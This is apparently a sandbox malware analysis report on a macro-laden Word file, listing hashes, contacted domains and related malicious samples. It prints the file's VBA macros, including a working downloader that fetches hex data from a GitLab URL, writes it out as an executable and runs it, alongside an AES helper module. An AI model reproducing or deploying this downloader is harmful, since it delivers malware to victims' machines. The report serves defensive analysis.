          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, templatesmetadata.office.net.edgekey.net, osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, ukw-azsc-000.roaming.officeapps.live.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.d
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          No simulations
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          s-part-0017.t-0009.fb-t-msedge.nethttps://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
          • 13.107.253.45
          https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
          • 13.107.253.45
          P-04071A.xlsGet hashmaliciousUnknownBrowse
          • 13.107.253.45
          P-04071A.xlsGet hashmaliciousUnknownBrowse
          • 13.107.253.45
          1736856908fb16676aec3e4c808c4bd5cde8e123cc70360266f85ec0ed17050bca6456c9dd274.dat-decoded.exeGet hashmaliciousXWormBrowse
          • 13.107.253.45
          pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
          • 13.107.253.45
          RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
          • 13.107.253.45
          https://Rtasia-sharepoint.zonivarnoth.ru/ITb4aThU/#Deddie.chan@rtasia.com.hkGet hashmaliciousUnknownBrowse
          • 13.107.253.45
          JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
          • 13.107.253.45
          3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
          • 13.107.253.45
          No context
          No context
          No context
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Reputation:high, very likely benign file
          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.6900941889251593
          Encrypted:false
          SSDEEP:3:klt+lllFKyFo+MldlfllsqJQLrCn:7tnBqJQLu
          MD5:C4686FB19BB891691B9FDF8EFB6F98E3
          SHA1:DCBD015C0354C9A0A0EA5E3336484674CCCAB037
          SHA-256:35CB8464AF65648DBC0AF4A454A4785F7E16CA3A3F1FAA357BA8EB489E8FD059
          SHA-512:0570C98FBD9B7BA38F6A8851F9E3676B82544A61C0C5B3D9A2239055F02ADD9648354B525F971A55C1F1E00FC931627EF782F3D7029B73F4AB5F3A058EFDFD8A
          Malicious:false
          Reputation:low
          Preview:.user.................................................a.l.f.o.n.s...`.N......_=..........a.i............................................._=.|&O.}..i......N..=.i
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: Victim, Revision Number: 27, Name of Creating Application: Microsoft Office Word, Total Editing Time: 29:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Mon Dec 16 10:19:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0
          Entropy (8bit):5.028164721042547
          TrID:
          • Microsoft Word document (32009/1) 54.23%
          • Microsoft Word document (old ver.) (19008/1) 32.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
          File name:q9JZUaS1Gy.doc
          File size:103'424 bytes
          MD5:f8de9b2f8b9088be3dda1985fe7b20c3
          SHA1:edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
          SHA256:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
          SHA512:1c31f24df1faa858edee44e14e7f7f90f68aa28de23a6debd7e61a99eaf33ae5921f10822a3efc028ea4ba4609f5d616fe050254c16dce19830b4caf4261106f
          SSDEEP:3072:1VKKLjov0/P6PhGi/dB1P1AHyEivubc98UvBuTh:bKj98UvBg
          TLSH:00A31649F181C92EDAD409B64C9BDBFEB3387D06AE44D71732A0B75E2CB27A4C146384
          File Content Preview:........................>.......................(...........*...............'...y..............................................................................................................................................................................
          Icon Hash:35e1cc889a8a8599
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Office Word
          Encrypted Document:False
          Contains Word Document Stream:True
          Contains Workbook/Book Stream:False
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Title:
          Subject:
          Author:ADMIN
          Keywords:
          Comments:
          Template:Normal
          Last Saved By:Victim
          Revion Number:27
          Total Edit Time:1740
          Create Time:2024-12-16 06:28:00
          Last Saved Time:2024-12-16 10:19:00
          Number of Pages:1
          Number of Words:3
          Number of Characters:18
          Creating Application:Microsoft Office Word
          Security:0
          Document Code Page:1252
          Number of Lines:1
          Number of Paragraphs:1
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:1048576
          General
          Stream Path:Macros/VBA/Module1
          VBA File Name:Module1.bas
          Stream Size:1128
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < 4 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 ce 03 00 00 00 00 00 00 01 00 00 00 d4 44 12 16 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Module1"
          Public Sub CallTestAES()
              Dim kakensooe As New ViewSession
              kakensooe.ikwiwiejs_19293_Ade
              
          End Sub
          
          

          General
          Stream Path:Macros/VBA/Module2
          VBA File Name:Module2.bas
          Stream Size:4972
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . n . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 fa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 01 05 00 00 81 0e 00 00 00 00 00 00 01 00 00 00 d4 44 0d 70 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Module2"
          Option Explicit
          
          ' Function chuy?n hex thnh nh? phn (byte array)
          Function HexToBinary(hexString As String) As Byte()
              Dim i As Long
              Dim length As Long
              Dim byteArray() As Byte
          
              length = Len(hexString) \ 2
              ReDim byteArray(length - 1)
          
              For i = 0 To length - 1
                  byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
              Next i
          
              HexToBinary = byteArray
          End Function
          
          ' Function t?i d? li?u hex t? URL
          Function GetDataFromURL(url As String) As String
              Dim http As Object
              Set http = CreateObject("MSXML2.XMLHTTP")
          
              On Error Resume Next
              http.Open "GET", url, False
              http.Send
              
              If http.Status = 200 Then
                  GetDataFromURL = http.responseText
              Else
                  GetDataFromURL = ""
              End If
              
              On Error GoTo 0
              Set http = Nothing
          End Function
          
          ' Sub luu file EXE t? d? li?u hex v ch?y
          Sub DownloadAndRunEXE()
              Dim hexData As String
              Dim binaryData() As Byte
              Dim savePath As String
              Dim fileNum As Integer
              Dim i As Long
          
              ' Bu?c 1: T?i d? li?u hex t? URL
              hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up") ' Thay URL b?ng link th?c t?
          
              If hexData = "" Then
                  MsgBox "Khng t?i du?c d? li?u t? URL.", vbCritical, "L?i"
                  Exit Sub
              End If
          
              ' Bu?c 2: Chuy?n hex thnh nh? phn
              binaryData = HexToBinary(hexData)
          
              ' Bu?c 3: Luu d? li?u thnh file EXE
              savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
              fileNum = FreeFile
              
              Open savePath For Binary As #fileNum
              For i = LBound(binaryData) To UBound(binaryData)
                  Put #fileNum, , binaryData(i)
              Next i
              Close #fileNum
          
              ' Bu?c 4: Ki?m tra file v ch?y
              If Len(Dir(savePath)) > 0 Then
                  Dim shell As Object
                  Set shell = CreateObject("WScript.Shell")
                  
                  ' Ch?y file EXE
                  shell.Run """" & savePath & """", 1, False
                  MsgBox "File EXE d du?c t?i v ch?y thnh cng!", vbInformation, "Thnh cng"
              Else
                  MsgBox "Khng th? t?o file EXE.", vbCritical, "L?i"
              End If
          End Sub
          
          

          General
          Stream Path:Macros/VBA/Module3
          VBA File Name:Module3.bas
          Stream Size:48244
          Data ASCII:. . . . . 4 . . . C . . . . . . . . . . C . . . . . . . . . . . . D . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B C r
          Data Raw:01 16 03 00 00 34 05 00 00 be 43 00 00 18 05 00 00 1c 06 00 00 ff ff ff ff c6 43 00 00 fe 94 00 00 08 00 00 00 01 00 00 00 d4 44 f8 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 9e 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 a4 02 50 00 00 00 00 00 00 00 00
          Attribute VB_Name = "Module3"
          '--- mdAesCtr.bas
          Option Explicit
          DefObj A-Z
          
          #Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)
          
          '=========================================================================
          ' API
          '=========================================================================
          
          #If Win64 Then
              Private Const PTR_SIZE                  As Long = 8
          #Else
              Private Const PTR_SIZE                  As Long = 4
          #End If
          
          #If HasPtrSafe Then
          Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
          Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
          Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
          Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
          '--- bcrypt
          Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
          Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
          Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
          #Else
          Private Enum LongPtr
              [_]
          End Enum
          Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
          Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
          Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
          Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
          '--- bcrypt
          Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
          Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
          Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
          #End If
          #If Not ImplUseShared Then
              #If HasPtrSafe Then
              Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
              Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
              Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
              Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
              Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
              #Else
              Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
              Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
              Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
              Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
              Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
              #End If
          #End If
          
          '=========================================================================
          ' Constants and member variables
          '=========================================================================
          
          Private Const AES_BLOCK_SIZE        As Long = 16
          Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
          Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
          Private Const KDF_SALTLEN           As Long = 8
          Private Const KDF_ITER              As Long = 10000
          Private Const KDF_HASH              As String = "SHA512"
          Private Const HMAC_HASH             As String = "SHA256"
          Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
          Private Const OPENSSL_MAGICLEN      As Long = 8
          Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
          Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"
          
          Private Type UcsCryptoContextType
              hPbkdf2Alg          As LongPtr
              hHmacAlg            As LongPtr
              hHmacHash           As LongPtr
              HashLen             As Long
              hAesAlg             As LongPtr
              hAesKey             As LongPtr
              AesKeyObjData()     As Byte
              AesKeyObjLen        As Long
              Nonce(0 To 3)       As Long
              EncrData()          As Byte
              EncrPos             As Long
              LastError           As String
          End Type
          
          Private m_uChunkedCtx           As UcsCryptoContextType
          
          '=========================================================================
          ' Functions
          '=========================================================================
          
          '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
          Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
              Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
              Dim baData()        As Byte
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim sError          As String
              
              baData = ToUtf8Array(sText)
              baPass = vbNullString
              baSalt = vbNullString
              If Not IsArray(Password) Then
                  If Not IsMissing(Password) Then
                      baPass = ToUtf8Array(Password & vbNullString)
                  End If
                  ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                  Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
              Else
                  baKey = Password
              End If
              If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
                  Err.Raise vbObjectError, , sError
              End If
              If Not IsArray(Password) Then
                  ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
                  If UBound(baData) >= PREFIXLEN Then
                      Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
                  End If
                  Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
                  Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
              End If
              AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
          End Function
          
          '--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
          Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
              Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
              Dim baData()        As Byte
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim sMagic          As String
              Dim sError          As String
              
              baData = FromBase64Array(sEncr)
              baPass = vbNullString
              baSalt = vbNullString
              If Not IsArray(Password) Then
                  If Not IsMissing(Password) Then
                      baPass = ToUtf8Array(Password & vbNullString)
                  End If
                  If UBound(baData) >= PREFIXLEN - 1 Then
                      sMagic = String$(OPENSSL_MAGICLEN, 0)
                      Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
                      If sMagic = OPENSSL_MAGIC Then
                          ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                          Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                          If UBound(baData) >= PREFIXLEN Then
                              Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                              ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                          Else
                              baData = vbNullString
                          End If
                      End If
                  End If
              Else
                  baKey = Password
              End If
              If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
                  Err.Raise vbObjectError, , sError
              End If
              AesDecryptString = FromUtf8Array(baData)
          End Function
          
          Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
              Const VT_BYREF      As Long = &H4000
              Dim uCtx            As UcsCryptoContextType
              Dim vErr            As Variant
              Dim bHashBefore     As Boolean
              Dim bHashAfter      As Boolean
              Dim baPass()        As Byte
              Dim baSalt()        As Byte
              Dim baKey()         As Byte
              Dim baTemp()        As Byte
              Dim lPtr            As LongPtr
              
              On Error GoTo EH
              If IsArray(Hmac) Then
                  bHashBefore = (Hmac(0) <= 0)
                  bHashAfter = (Hmac(0) > 0)
              End If
              If IsMissing(Password) Then
                  baPass = vbNullString
              ElseIf IsArray(Password) Then
                  baPass = Password
              Else
                  baPass = ToUtf8Array(Password & vbNullString)
              End If
              If IsMissing(Salt) Then
                  baSalt = baPass
